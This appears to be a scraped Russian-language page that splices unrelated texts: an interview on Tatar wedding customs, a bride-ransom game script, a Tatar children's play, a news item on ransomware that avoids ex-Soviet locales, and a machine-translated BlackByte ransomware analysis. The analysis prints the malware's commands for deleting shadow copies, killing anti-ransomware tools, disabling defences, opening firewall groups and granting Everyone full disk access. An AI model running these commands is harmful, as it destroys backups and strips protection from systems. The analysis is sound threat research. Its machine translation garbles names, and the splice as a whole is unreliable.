    Но важную роль продолжал играть и адат (обычай). Так, несмотря на предписания ислама, ранние браки не были характерны для татар. Во время переписи 1897 г. отмечалось: «Браки в более раннем или даже очень несовершеннолетнем возрасте, возможные среди магометан… представляют собой в Казанской губернии исключительно редкое явление». При этом существовал обычай соблюдения старшинства при вступлении в брак среди братьев и сестёр. Даже сейчас в сельской местности эту традицию стараются соблюдать.

    У татар существовали три формы заключения брака: по сватовству (димнәп), путём ухода девушки к любимому без разрешения родителей (ябышып киту, или ябышып чыгу), посредством похищения невесты (кыз урлау). Две последние формы бракосочетания встречались довольно редко и осуждались общественным мнением.

    Вступление в брак было священной обязанностью мусульманина. Фото: Из личного архива

    У татар конца XIX – начала ХХ века, так же как и у большинства других народов, преобладал брак по сватовству. Начинался он с обряда сватовства (яучы җибәрү, димләү, ярәшү), во время которого обговаривались условия, в том числе количество и качество даров со стороны жениха (калын, калын малы). Сватами были чаще родственники жениха или специальные свахи в городах. Позже родители невесты приглашали сватов и родителей жениха на сговор-помолвку (аклашу, килешү), во время которого они обменивались подарками. После этого будущие родственники ещё не раз встречались, угощали друг друга и обменивались дарами.

    Две отдельные свадьбы

    Сама свадьба – туй, никах туй — проходила в доме невесты. Родители жениха везли с собой калын и угощение: пару гусей, несколько пышных хлебов, пироги, специальное свадебное лакомство чак-чак и так далее. Свадьба начиналась с никаха – религиозного обряда бракосочетания. Мулла записывал условия заключения брака в книгу регистрации брака, включая сумму денег, которую в случае развода по инициативе мужа он должен был бы выплатить жене. Молодые на этой свадьбе не присутствовали, свидетелями выступали отец жениха и два родственника невесты. При этом свидетели должны были узнать о согласии невесты, которая находилась за занавеской или в другой половине дома. Получив утвердительные ответы свидетелей, мулла зачитывал суры из Корана, посвящённые бракосочетанию, после чего начиналось застолье.

    Казанские татары играли свадьбу отдельно для мужчин и женщин, причём последних обычно угощали после того, как расходились мужчины. Свадьба в доме невесты длилась два-три дня. После неё молодая жена некоторое время жила в доме своих родителей, а муж навещал её. Переезд в дом мужа (килен төшерү) тоже сопровождался многочисленными обрядами. Как правило, свадьба в доме жениха устраивалась много позже.

    О запретном для женщин

    — Какие ограничения налагались на замужнюю татарку?

    — На рубеже XIX–XX веков семейные отношения татар жёстко регламентировались общественной моралью, государственным правом и религиозными предписаниями. Во главе семьи стоял муж (в трёхпоколенных семьях — отец), представляющий семью на сельском сходе. Он был собственником всего имущества в семье, ведал семейной кассой и обладал непререкаемым авторитетом в семье и преимущественным правом решения всех вопросов семейной жизни.

    Татарские семьи были малодетными. Фото: Из личного архива

    Роль жены сводилась к занятию домашним хозяйством, уходу за мужем, детьми и другими членами семьи. Экономически зависимая от мужа и юридически бесправная, она занимала подчинённое положение. Затворничество и зависимое положение женщины было характерно для патриархальной семьи и у других народов края: марийцев, мордвы, башкир. Бесправны и зависимы от мужа были и русские женщины. До начала ХХ века у кряшен и других групп татар бытовал один из обычаев адата – оялу (избегание), включавший целую серию запретов: жена не могла показаться перед родственниками мужа с открытыми головой, руками, ногами; невестка избегала общения с родственниками мужа мужского пола в течение определённого времени, иногда это продолжалось несколько лет до совершения особого обряда (авыз ачу), после чего запрет снимался. При приёме гостей-мужчин она подавала угощение из-за занавески чаршау, отделявшей женскую часть жилого помещения. При встрече с посторонними мужчинами на улице женщина-татарка должна была прикрыть лицо концом платка, спускающегося по спине. 

    Эти нормы повседневной жизни часто нарушались: в городских семьях татарской буржуазии и национальной интеллигенции женщины были более свободными. В начале ХХ века среди татарок были предприниматели, редакторы журналов, слушательницы медицинских курсов и даже студентки зарубежных университетов. Они посещали и концерты, и спектакли местных театров. Тем не менее даже в расписании казанской татарской библиотеки предусматривались отдельные дни для женщин.

    — Ислам допускает многоженство, но, насколько я знаю, среди татар оно не было распространено.

    — Основным для татар всегда был моногамный брак. Несколько жён могли себе позволить состоятельные слои городского населения – купцы, духовенство. По данным 1844 года, из 2112 мужчин, проживавших тогда в Казани, только 55 имели по две жены, 6 человек — три и двое – по четыре жены, итого не более 3%. Двоежёнство не было характерным и для сельских татар. Хотя бывали случаи, когда муж женился против воли первой жены. Историки нашли в архивах материал о женитьбе известного купца и фабриканта М. Т. Хозясеитова из с. Нижняя Ура (ныне Арский район РТ). Старшая жена не приняла молодую жену, устраивала в семье скандалы, и он вынужден был развестись с первой женой, хотя и не оставил её без своей заботы и попечения.

    Мода на халяльную свадьбу

    — Как изменились свадебные обычаи после революции и какие тенденции учёные наблюдают сейчас?

    — В советские годы были разные периоды трансформации свадебной обрядности, особенно в городах. В 20-30-е годы девушки довольно часто выходили замуж без разрешения родителей, в 20-40-х часто стали проводить безрелигиозные свадьбы — кызыл туй (дословно — «красная свадьба»); в 60-70-х появился ритуал торжественной регистрации брака. А вот никах тогда проводили тайно, порою это делали родители, даже не ставя в известность молодожёнов.

    Сейчас с ростом этноконфессиональной идентичности татар в их жизнь активно возвращаются религиозные традиции. Так, среди семей, обследованных в республике в 2013 году, около 80% в городах и около 90% в сёлах справляли никах. В основном — дома, но в городах всё чаще никах организуют в мечетях. Обряд сопровождается выдачей свидетельства о проведении никаха, который, хотя и не обладает юридической силой, воспринимается как важный семейный документ.

    Современная свадебная мода у татар. Фото: АиФ/ Артем Дергунов

    Современная татарская свадьба проходит чаще всего параллельно в двух формах – светской и религиозной. В последние годы после никаха и государственной регистрации брака свадебное торжество проводят в форме мусульманской (халяльной, или безалкогольной) свадьбы. А еще во многих семьях появилась новая семейная традиция – ежегодное празднование дня свадьбы. В целом, мы наблюдаем возврат к традициям не в их канонической форме, а обновление — традиции-новации, складывающиеся под влиянием процесса реисламизации татарского общества и процессов модернизации и глобализации.

    — Насколько крепкими были браки у татар?

    — Разводы среди татар были весьма редкими, несмотря на видимую лёгкость (мужу достаточно было трижды произнести фразу «талак» и получить от муллы разводное письмо). Татарские семьи и сейчас сравнительно устойчивы. Уровень разводов в Татарстане по данным за 2017 год в 1,5 раза ниже, чем в среднем в России (в республике на 1000 браков приходится 503 развода, в России – 800), а среди районов республики уровень их ниже там, где преобладает татарское население.

    Определённую роль в стабильности брачных союзов продолжают играть общественное мнение, сохранившаяся традиция негативного отношения к разводам, а также тесные родственные связи, столь характерные для татар.

    Выкуп невесты, сценарий выкупа невесты

    Сценарий выкупа невесты

    Традиция выкупа невесты стара, как и сам брачный ритуал. И редко какаясвадьба в Белгороде обходится без церемонии выкупа невесты. Несмотря на то, что на современной свадьбе выкуп невесты – всего лишь игра, но, как правило, это игра обязательная, в которой принимают участие подружки и родственники невесты – с одной стороны, и жених со своими друзьями – с другой. Так в день свадьбы жених и его свита направляются к дому невесты, где их уже поджидают родственники и друзья невесты. На последних возлагается задача создать жениху и его друзьям как можно больше препятствий, чтобы получить как можно больший выкуп за невесту. Если подружкам невесты не лень проявить фантазию и придумать или найти интересный сценарий выкупа невесты, то на пути следования свадебного кортежа жениха они могут соорудить целые крепости, которые жениху придется взять с помощью находчивости и остроумия. Поэтому выкуп невесты сопровождается конкурсами, загадками и шуточными заданиями для жениха и его друзей по заранее продуманному сценарию выкупа невесты. И если невеста перед свадьбой волнуется, как она будет выглядеть, какие эмоции в день свадьбы будет испытывать, как пройдет торжество, то подружки невесты волнуются и готовят не только красивые платья, но и сценарий выкупа невесты.  Многие хотят найтиприкольный сценарий выкупа невесты, некоторые хотят разыграть тематический сценарий выкупа невесты, но все ограничены по времени, а потому из множества приходится выбирать. Какой выкуп невесты будет у вас, решать вам. На нашем сайте представлены интересные конкурсы для жениха, которые Вы можете включить в свой сценарий выкупа невесты. Выбирайте те конкурсы для выкупа невесты, которые наиболее Вам подойдут, и делайте свой неповторимыйсценарий выкупа невесты. Все нижеприведенные конкурсы были использованы на различных свадьбах в разных городах России и доставляют массу положительных эмоций гостям как во время свадьбы, так и после при просмотре свадебного фильма, который создаст Ваш видеооператор.

    Чем выкупают невесту? Обычно цветами и сладостями и символическим количеством денег, которые жених платит подружкам невесты, если не справляется с теми заданиями, которые они для него приготовили. Итак…

    Сценарий выкупа невесты:

    Свидетельница:

    Понаехало гостей

    Со всех дальних волостей.

    При параде, все красивы,

    Это диво, так уж диво!

    Ну-ка, гости, не роптать!

    Можно Вам вопрос задать?

    Что ж Вы так вот всем гуртом

    Обступили этот дом?

    Что влечет Вас в это место?

    Отвечайте-ка…

    Гости:

    Невеста!

    Свидетельница:

    Ах, невеста, говорите,

    Но тогда уж не взыщите!

    Приготовьтесь выкуп дать,

    Чтоб невесту ту забрать.

    В доме всех гостей не счесть,

    Но хозяин дома – тесть.

    Так тревожится, болеет…

    Коль не выпьет – околеет!

    Вы уж, гости, для приличья,

    Да по нашему обычью

    Дайте водочки ему –

    Чтобы горя не было в дому.

    Ох, а теща как рыдает!

    Дочь из дома не пускает.

    Но мы ее уговорим,

    Коль ей шампанского дадим!

    Жених должен налить гостям невесты шампанского.

    Выкуп невесты конкурс №1

    Свидетельница предлагает три упакованных букета – в одном домашний веник, во втором – банный веник, в третьем – свадебные цветы. Жених указывает на один из букетов, если он взят неверно, свидетельница требует выкуп.

    Видно, малость оплошали,

    Коль Вы банный веник взяли.

    За попытку за вторую

    Дайте денежку какую…

    Ой, и этот не годится,

    Знать, придется расплатиться.

    Жених платит какую-то денежку…

    Свидетельница:

    Ну, а этот букет к месту,

    Он понравился невесте.

    Вот теперь пора идти –

    Только что тут на пути?

     

    Выкуп невесты конкурс №2

    На двери дома невесты укреплена табличка: «Кооператив по выдаче невест»

    В нашем доме коммерсанты –

    Настоящие таланты.

    Случая не упустили –

    Кооператив открыли.

    Вам подыщут по заказу

    Быстро, четко, прямо сразу!

    Свидетельница открывает дверь в дом невесты. Прямо у порога две-три подружки пьют чай (болтают / бездельничают / лузгают семечки). Или если есть возможность поставить столик небольшой и на нем табличку «Обеденный перерыв с… до… часов» Указано время приезда жениха в дом невесты.

    Да… Обед… Вот незадача…

    Взятка – вот Ваша удача!

    Коммерсантам взятку дайте

    И невесту выбирайте!

    Жених со свидетелем дают подругам невесты «взятку». Те выставляют на стол три пиалы, в которых положены по три «бочонка» от «киндер-сюрпризов». В них спрятаны карточки с приметами невесты. Около каждой пиалы указатель «Рост», «Цвет глаз», «Имя».

    Подруги:

    Вот компьютер – указатель,

    Разберись-ка здесь, приятель.

    Дело ясное, понятное,

    Информация вся платная.

    Свидетельница, обращаясь к гостям:

    Ну, жених, ты постарайся,

    Да смотри, не ошибайся.

    Помогите уж ему –

    Нищим стал в нашем дому!

    Жених выбирает «бочонок» из первой пиалы. Варианты надписей на карточках (Рост): Эйфелева башня, Лесной опенечек, и третья с указанием роста невесты. Если жених ошибается – платит.

    Свидетельница:

    Вы нас строго не судите,

    Не нужна башня – платите.

    Коль не нужен и опенок –

    Снова ждем от вас деньжонок!

    С ростом мы разобрались.

    Ну, жених, поднапрягись.

    Будем нужный цвет искать.

    Вы какой хотите взять?

    Жених выбирает один из «бочонков». Варианты надписей на карточках с цветом: Серо-буро-малиновый, черный в желтый горошек и цвет невесты.

    Подруги:

    Мы не угодили с цветом?

    Но оплаты ждем при этом.

    Ой, какой же привереда!

    Торопись ,пора обедать!

    Ну, последняя задача –

    Деньги нам, коль неудача.

    Жених выбирает «бочонок», в котором карточка с именем. Варианты надписей: Тракторина, Олимпиада и имя невесты.

    Не нужна Олимпиада?

    А за работу денег надо.

    Что у вас такая мина?

    Не устроит Тракторина?

    Есть еще у вас деньжата?

    Мы расчета ждем, ребята!

    Жених рассчитывается за ошибки.

    Выкуп невесты конкурс №3

    Далее лестница. К лестнице или к квартире невесты ведут три листочка, на каждом из которых с обратной стороны написано «По расчету», «По необходимости», «По любви». Жениху предлагается выбрать наугад листочек и сказать, почему он жениться. Если жених выбирает «По расчету» или «По необходимости» — должен заплатить денежку.

     

    Выкуп невесты конкурс №4 – очень веселый для раскрепощенного жениха!

    Когда жених проходит один лестничный пролет перед ним ставят таз. Свидетельница говорит слова: «За невестину красу, танцуй жених нам на тазу!» И жених должен купить тазик и, забравшись на него, станцевать танец.

    Можно использовать такие слова:

    «Чтоб невесту мы отдали, на тазу б вы станцевали!

    Ведь тазик это не пустяк, традиция ведь как-никак!

    А чтобы тазик вам купить, нужно денег заплатить!»

    После того, как тазик приобретен, жених под музыку танцует на тазу.

     

    Выкуп невесты конкурс №5 – для сильного свидетеля

    Следующий лестничный пролет пройден. Свидетельница говорит Жениху:

    Ты легко идешь, но вот незадача – дальше без рук без ног преодолей лестничный пролет. Если жених догадается, что его должен на себе перенести свидетель или гости, то пройдут, если нет – платят выкуп.

     

    Выкуп невесты конкурс №6 – хорошо ли жених знает свою невесту?

    Подружки невесты готовят к выкупу невесты ромашку, на каждом лепестке которой написаны вопросы:

    — Назови день, когда познакомился с невестой?

    — Где это было?

    — Какого цвета у невесты глаза?

    — Какую пору года она больше всего любит?

    — Какие цветы она любит?

    — Где ты ее впервые поцеловал?

    И т.д. Перед этим правильные ответы нужно спросить у невесты. Если жених отвечает неправильно – платит.

     

    Выкуп невесты конкурс №7 – угадай невесту по поцелую

    На стене или на двери клеят заранее подготовленный лист с различными поцелуями девушек, один из которых принадлежит невесте. Жених должен угадать, какой поцелуй принадлежит любимой. Не угадывает – платит.

    А вот и листочек с загадкой мудреной,

    Найдешь ли ты губки своей нареченной?

     

    Выкуп невесты конкурс №8 – на знание русского языка и внимательность

    В коридоре на двери висит табличка

    «В этом тереме томиться сероглазая девица».

    Свидетельница предлагает жениху:

    «Коль ошибку ты найдешь, сразу в терем попадешь (нужно найти в надписи ошибку)».

    Подвох состоит в том, что жених скорее всего найдет ошибку в слове «томиться», но вряд ли заметит то, что его невесту назвали сероглазой, хотя у нее глаза голубые.

     

    Выкуп невесты конкурс №9 – сколько лет?..

    Положи на тарелочку столько монет, сколько ты будешь жить с невестой лет.

     

    Выкуп невесты конкурс №10 – три стакана

    Свидетельница предлагает жениху и его свите:

    «Нельзя обойти, окажи свою милость,

    Наполни стаканы, чтоб я не стыдилась:

    В одном, чтоб шуршало,

    В другом, чтоб звенело,

    А в третьем, чтоб бурная пена шипела»

    Жених должен положить бумажную денежку, монетки и налить в третий стакан шампанского.

     

    Выкуп невесты конкурс №10 — вокальный

    Вот дорожка пред тобой,

    Ты по ней иди и пой,

    Песню до ворот споешь,

    До ворот тогда дойдешь.

    Жених должен пройти по лестничному пролету, например, или по заранее расстеленной дорожке и спеть песню о любви.

    Выкуп невесты конкурс №11 – обещание…

    Жениху предлагается яблоко, в которое воткнуты заранее спички. Жених должен доставать из яблока спичку пока не найдет надломленную и обещать, что он будет делать дома.

    «А теперь, дружок любезный,

    Нашим яблоком не брезгуй,

    Ты подумай на досуге,

    Чем поможешь ты супруге.

    Ты из яблока по спичке возьми,

    Чем поможешь жене подскажи?..»

     

    Выкуп невесты конкурс №12 – на память жениха

    На каждой ступеньке лестницы выложены листочки с определенными датами, например 25 мая 2010 года. Свидетельница обращается к жениху:

    А теперь вопрос другой,

    Ты, жених наш дорогой,

    Буйну голову ломай

    И все числа угадай.

     

    Выкуп невесты конкурс №13 – у дверей невесты

    Вот и пришел жених к комнате, в которой спрятана невеста. Перед комнатой висят три шарика, в каждый из которых положена заранее бумажка, только в двух шариках на бумажках написаны слова – «Плати денежку, ищи дальше!», а в третьем «Ты нашел ключ!!!» Жених должен угадать шарик, в котором спрятан такой символический ключ от дверей невесты. Не угадывает – платит и ищет дальше.

     

    Выкуп невесты конкурс №14 – туфелька

    Часто на свадьбах делают такой конкурс – когда жених уже зашел в комнату невесты, невеста сидит в одном туфле. Рядом стоят закрытые коробки с различной обувью. Жениху предлагается обуть невесту – найти коробку, в которой находится второй туфель невесты. Как правило, женихи находят очень быстро»

     

    После всех конкурсов сценарий выкупа невесты, красиво завершается следующими словами свидетельницы:

    Что ж всем угодили вроде…

    Объявляем при народе –

    Есть у нас такая дева.

    Пойдете прямо, здесь налево.

    Вот она, ее светлица,

    Здесь невестушка томится.

    Свидетельница, обращаясь к невесте:

    Обещает твой жених –

    Будет нежен, будет тих.

    Этот день он не забудет,

    Мешками деньги носить будет.

    Всех одарит, ублажит,

    От забот не убежит.

    Взял он всем, как говориться.

    Как тебе жених?

    Невеста отвечает:

    Годится!

    Свидетельница:

    Невесту береги, жених,

    От невзгод и бурь лихих.

    Чтоб расцветала, чтоб плоды давала,

    Счастье в ней твое – береги ее!

    Ну а мы здесь всем гуртом

    Дружно чарочки нальем!

    И свидетельница приглашает всех гостей за первое небольшое застолье в доме невесты.

    Сценарий сказки на татарском языке по произведению А. Алиша «Куян кызы»

    Сценарий сказки на татарском языке по произведению А. Алиша

    «Куян кызы» — «Зайчишка»

    Под спокойную зимнюю музыку

    1. Кар бөртекләре биюе.(кызлар)

    2. КУЯН:

    -Менә кыш җитте.

    Урманда салкын

    Кызыма итек кирәк.

    Базарга барыйм әле.(китә).

    3. КУЯН КЫЗЫ:

    Мин Куян кызы.

    Зур колаклы. Бик иркә.

    Әнием мине бик ярата.

    4. КУЯН (итекләр белән):

    -Кызым, кызым, кил әле.

    Мә итек ки. Аякларын туӊмасын, сызламасын.

    5.КУЯН КЫЗЫ- (шатланып):

    -Рәхмәт, әнием! Итек матур, җылы!

    Җыр:

    1.Итекләрем, итекләр

    Бизәкледер читләре.

    Шундый матур итекле

    Куян булдым бит әле.

    2.Әнием дә сөенде

    Кочаклап алып сөйде.

    Шундый матур итекләр

    Бигрәк килешә, диде.

    6.Куяннар керәләр. Итекләр белән күӊелле бию башкаралар.

    7.КУЯН КЫЗЫ (итекләрен салып ыргыта):

    -Кирәкми миӊа итек!!!!!!

    8.КУЯН (йөгереп килә) :

    -Кызым, кызым, салма итегенне. Аякларын туӊмасын, сызламасын.

    (итекләрне кияргә ярдәм итә, китә)

    9.Беренче Куян:

    -Әни сүзен тыӊларга кирәк.

    10.Икенче Куян:

    -Итекләрне салма!

    11.Куяннар китәләр.

    КУЯН КЫЗЫ кала.

    «БУРАН» биюе. Куян Кызына салкын.

    12. КУЯН КЫЗЫ (аксый-аксый):

    -Әни, әни, минем аягым бик авырта.

    13.КУЯН:

    -Кызым, кызым, якты йолдызым, синеӊ аягыӊ шешкән бит. Инде ни эшләргә?

    14ТИЕН:

    -Кайгырма, Куянкай. Доктор Айболитка бар. Ул ярдәм итәр.

    15.КУЯН:

    -Рәхмәт, Тиен! Кызым, әйдә Доктор Айболитка барабыз.

    (Доктор Айболитка китәләр).

    16. Доктор Айболит керә.

    АЮ:

    -Доктор Айболит! Аяк авырта!

    БҮРЕ:

    -Доктор Айболит! Баш авырта.

    ТӨЛКЕ-

    -Доктор Айболт! Койрык авырта

    17.ДОКТОР АЙБОЛИТ:

    -Туктагыз, туктагыз! Балаларны чиратсыз карыйм мин!

    Куян кызы, кил әле монда! Утыр.Аягын синеӊ шешкән. Хәзер дару сөртәм.

    -Салкын көннәрдә итекләрне салма.

    18.КУЯН КЫЗЫ :

    -Рәхмәт, Доктор Айболит, Сау булыгыз!

    20.КУЯН КЫЗЫ:

    -Әни сүзен тыӊларга кирәк!

    Код в масштабной атаке программ-вымогателей, написанный для того, чтобы избежать компьютеров, использующих русский язык, говорится в новом отчете родственные языки, согласно новому отчету фирмы по кибербезопасности.

    Давно известно, что некоторые вредоносные программы включают эту функцию, но отчет Trustwave SpiderLabs, полученный эксклюзивно NBC News, кажется первым, в котором публично указывается, что это элемент последней атаки, которая, как считается, является Крупнейшая кампания программ-вымогателей за всю историю.

    «Они не хотят раздражать местные власти, и они знают, что смогут вести свой бизнес намного дольше, если будут делать это таким образом», — сказал Зив Мадор, вице-президент Trustwave SpiderLabs по исследованиям в области безопасности.

    Нажмите здесь, чтобы прочитать отчет

    Новое разоблачение подчеркивает масштабы происхождения большинства программ-вымогателей из России и бывшего Советского Союза, а также выдвигает на первый план проблему, стоящую перед администрацией Байдена, поскольку она обдумывает возможный ответ.

    Байден сказал во вторник, что его администрация еще не определила, откуда произошла последняя атака. Похоже, что это не оказало значительного разрушительного воздействия на США, но, по словам исследователей безопасности, его называют крупнейшей по объему атакой программ-вымогателей в истории, заразившей около 1500 организаций.

    Атака была особенно изощренной, с использованием ранее неизвестной программной уязвимости — уязвимости «нулевого дня» — для заражения ИТ-фирмы, которая затем заразила другие ИТ-фирмы, которые затем заразили сотни клиентов.

    Trustwave заявила, что программа-вымогатель «избегает систем с языками по умолчанию из региона СССР. Сюда входят русский, украинский, белорусский, таджикский, армянский, азербайджанский, грузинский, казахский, киргизский, туркменский, узбекский, татарский, румынский, русский молдавский. , сирийский и сирийский арабский».

    В мае эксперт по кибербезопасности Брайан Кребс отметил, что программа-вымогатель DarkSide, российской группы, атаковавшей Colonial Pipeline в мае, «имеет жестко закодированный список стран, которые нельзя устанавливать», включая Россию и бывшие советские спутники, которые преимущественно имеют благоприятные отношения с Кремлем.

    Colonial управляет крупнейшим топливным трубопроводом в США и была вынуждена прекратить все операции на несколько дней, пытаясь вернуться в сеть, что привело к нехватке газа по всей стране.

    Как правило, криминальные группы вымогателей могут безнаказанно действовать в России и других бывших советских республиках до тех пор, пока они сосредотачивают свои атаки на Соединенных Штатах и ​​Западе, говорят эксперты.

    Кребс отметил, что в некоторых случаях простая установка виртуальной клавиатуры с русским языком на компьютер под управлением Microsoft Windows приводит к тому, что вредоносные программы обходят этот компьютер.

    Администрация Байдена пытается использовать глобальную поддержку, чтобы заставить Россию и ее соседей принять жесткие меры.

    Кен Диланиан — корреспондент отдела разведки и национальной безопасности отдела расследований NBC News.

    Программа-вымогатель BlackByte — Pt. 1 Углубленный анализ

    Основная функция запутанного Jscript — декодировать основную полезную нагрузку и запустить ее в памяти. Ниже приведен деобфусцированный и улучшенный код:

    .

    Полезная нагрузка DLL

    Полезная нагрузка представляет собой файл .NET DLL (управляемый код), который содержит класс с именем jSfMMrZfotrr.

    Рисунок 3. DLL-файл сборки .NET

    Основная цель этой библиотеки DLL следующая:

    1. Добавьте файлы с расширениями . JS и .EXE в список исключений Microsoft Defender.
    2. Обходите библиотеку DLL Microsoft Antimalware Scan Interface (AMSI), чтобы она не сканировала загруженное вредоносное ПО и не предупреждала пользователя о подозрительной активности .
    3. Проверьте наличие следующих библиотек DLL:

        — SbieDll.dll (песочница)         
        — SxIn.dll (тестовая среда Qihoo360)
        — Sf2.dll (Avast Antivirus)
        — snxhk.dll (Avast)
        — cmdvrt32.dll (Comodo Internet)

    1. Извлеките и расшифруйте основную полезную нагрузку (программу-вымогатель BlackByte) из ресурсов, а затем выполните ее в памяти.


    Извлечение основной полезной нагрузки — BlackByte — было непростым делом, поскольку оказалось, что исполняемый двоичный файл зашифрован.

    Рисунок 4. Двоичный файл программы-вымогателя находится в папке .NET-файл ресурсов сборки с именем GOor.PVT5.

     

    Чтобы упростить и обойти анализ уровня шифрования и обфускации, мы просто запускаем код JScript с помощью команды cscript:

    cscript. exe <вредоносная программа запуска JScript>

    Затем мы запускаем вредоносную сборку .NET в памяти. После этого мы сбросили все сборки .NET, включая расшифрованный исполняемый файл BlackByte .NET. Для этого мы использовали инструмент под названием MegaDumper.

    Рисунок 5. Сбросив файл CSCRIPT.EXE, выполняющий вредоносный сценарий, мы можем создать дамп всех сборок .NET, работающих в его памяти.

     

    Рис. 6. После создания дампа расшифрованные сборки .NET сохраняются на диске, и мы можем приступить к их анализу.

     

    BlackByte: подготовка зараженной системы

    Перед шифрованием BlackByte сначала подготавливает систему, чтобы ничто не мешало ей выполнять процедуру шифрования файлов.Во время инициализации программа-вымогатель устанавливает значение основных полей, таких как заметки о выкупе, расширение зашифрованного файла, криптографическая соль, имя ОС и другие. Затем генерируется идентификация жертвы путем объединения идентификатора процессора зараженной системы и серийного номера тома и их хеширования с помощью MD5. Программа-вымогатель создает мьютекс с именем Global\1f07524d-fb13-4d5e-8e5c-c3373860df25 и прекращает работу, если этот мьютекс уже существует.

    Рисунок 7

    После этого он проверяет, есть ли языковой стандарт системы в списке языковых кодов, как показано ниже.Если системный язык по умолчанию есть в списке, BlackByte завершает работу:

    Код КПП 47

    Язык

    Код языка

    хай-АМ

    Армянский (Армения)

    1067

    аз-Сирл-АЗ

    Азербайджанский (кириллица) — Азербайджан

    2092

    Сайаз-АЗ

    Азербайджанский (кириллица) — Азербайджан

     

    Лт-аз-АЗ

    Азербайджанский (латиница) — Азербайджан

    1068

    be-BY

    Беларусь — Беларусь

    1059

    кк-КЗ

    Казахстан — Казахстан

    1087

    кы-кз

    Кыргызстан — Казахстан

     

    кы-кз

    Кыргызстан — Казахстан

     

    тт-RU

    Татарский — Россия

     

    ба-РУ

    Башкирский (Россия)

     

    сах-RU

    Саха (Россия)

     

    ru-RU

    Русский (Россия)

    1049

    тг-Cyrl-TJ

    Таджикский (кириллица, Таджикистан)

    1064

    уз-Кирл-УЗ

    Узбекский (кириллица, Узбекистан)

    2115

     

    Узбекский (латиница)

    1091

    uk-UA

    Украинский (Украина)

    1058

    ка-GE

    Грузинский (Грузия)

    1079

     

    Туркменский

    1090

    Программа-вымогатель также устанавливает класс приоритета процесса выше обычного и использует API SetThreadExecutionState , чтобы предотвратить переход системы в спящий режим. Затем он удаляет приложения и завершает процессы, которые могут помешать шифрованию целевых файлов. Ниже приведены действия, которые он выполняет в системе:

    Перечисляет раздел реестра:

    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Параметры выполнения файла образа

    Затем удаляются следующие подразделы:

    1. vssadmin.exe
    2. wbadmin.exe
    3. bcdedit.exe
    4. powershell.exe
    5. тень диска.исполняемый файл
    6. net.exe
    7. тасккилл.exe
    8. wmic.exe

    BlackByte завершает работу Raccine, утилиты для защиты от программ-вымогателей, и удаляет ее из зараженной системы, выполнив команду:

    taskill.exe /F /IM Raccine.exe
    taskill.exe /F /IM RaccineSettings.exe
    schtasks.exe /DELETE /TN \»Raccine Rules Updater \" /F

    Он также удаляет все ключи реестра, связанные с Raccine, включая:

    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name = «Raccine Tray»
    HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine

    Он запускает серию команд SC для отключения списка служб:

    шт. exe config SQLTELEMETRY start = отключено

    sc.exe config sc SQLTELEMETRY$ECWDB2 start = отключено

    sc.exe config SQLWriter start = отключено

    Конфигурация sc.exe Запуск SstpSvc = отключено

    sc.exe config MBAMService start = отключено

    Конфигурация sc.exe wuaauserv start = отключено

    Он также включает следующие услуги:

    DNS-кэш

    фдфхост

    FDResPub

    ССДПСРВ

    аппхост

    Удаленный реестр

    Он использует RmShutdown API Microsoft Restart Manager для завершения следующих процессов:

    агнцвц

    CNTAOSMgr

    dbeng50

    дбснмп

    encsvc

    первенствовать

    фаерфокс

    firefoxconfig

    инфопат

    isqlplussvc

    mbamлоток

    мсдоступ

    мсфтескл

    mspub

    mydesktopqos

    мой рабочий столсервис

    mysqld

    mysqld-нт

    mysqld-опт

    Нтрцкан

    ocautoupds

    окомм

    ОССД

    OneNote

    оракул

    внешний вид

    PccNTMon

    мощность

    скбкоресервис

    sql

    склорагент

    sqlbrowser

    sqlservr

    sqlwriter

    пар

    время синхронизации

    тбердконфиг

    летучая мышь

    thebat64

    грозовая птица

    tmllisten

    видио

    винворд

    набор слов

    xfssvccon

    зоолз

    любой рабочий стол

    хром

    опера

    сообщение

    фаерфокс

    исследовать

    проводник

    винлогон

    SearchIndexer

    Вининит

    SearchApp

    ПоискUI

    Пауэршелл

     

    Для удаления всех теневых копий на всех томах, удаления точек восстановления Windows, отключения контролируемого доступа к папкам, включения сетевого обнаружения, предоставления «всем» полного доступа к целевым дискам, также выполняются следующие команды «жить вне земли». удалите корзину, включите общий доступ к файлам и принтерам и включите протокол SMB1.

    vssadmin.exe изменить размер теневого хранилища /for=c: /on=c: /maxsize=401MB

    vssadmin.exe изменить размер теневого хранилища /for=c: /on=c: /maxsize=unbounded

    vssadmin.exe изменить размер теневого хранилища /for=d: /on=d: /maxsize=401MB

    vssadmin.exe изменить размер теневого хранилища /for=d: /on=d: /maxsize=unbounded

    vssadmin.exe изменить размер теневого хранилища /for=e: /on=e: /maxsize=401MB

    vssadmin.exe изменить размер теневого хранилища /for=e: /on=e: /maxsize=unbounded

    vssadmin.exe изменить размер теневого хранилища /for=f: /on=f: /maxsize=401MB

    vssadmin.exe изменить размер теневого хранилища /for=f: /on=f: /maxsize=unbounded

    vssadmin. exe изменить размер теневого хранилища /for=g: /on=g: /maxsize=401MB

    vssadmin.exe vssadmin.exe изменить размер теневого хранилища /for=g: /on=g: /maxsize=unbounded

    vssadmin.exe изменить размер теневого хранилища /for=h: /on=h: /maxsize=401MB

    vssadmin.exe изменить размер теневого хранилища /for=h: /on=h: /maxsize=unbounded

    vssadmin.exe Удалить тени /all /quiet
    powershell.exe Get-CimInstance Win32_ShadowCopy | Remove-CimInstance

    powershell.exe Set-MpPreference -EnableControlledFolderAccess отключен

    cmd.exe /c rd /s /q %SYSTEMDRIVE%\\$Recycle.ящик

    cmd.exe /c rd /s /q D:\\$Recycle.bin

    группа правил брандмауэра netsh advfirewall = «Сетевое обнаружение» new enable = Yes

    группа правил брандмауэра netsh advfirewall = «Общий доступ к файлам и принтерам» new enable = Yes

    powershell. exe Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

     icacls.exe" "<БУКВА ДИСКА>:*" /grant Все:F /T /C /Q 

    Программа-вымогатель устанавливает следующие параметры реестра для повышения локальных привилегий, подключения подключенных дисков, включения длинных путей:

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

    LocalAccountTokenFilterPolicy = REG_DWORD:1

    EnableLinkedConnections = REG_DWORD:1

    HKLM\SYSTEM\CurrentControlSet\Control\FileSystem

    Лонгпассенаблед = REG_DWORD:1

    BlackByte использует файл mountvol.exe для монтирования имен томов и использования инструмента Microsoft Discretionary Access Control List — icacls.exe, чтобы предоставить группе «Все» полный доступ к корню диска.

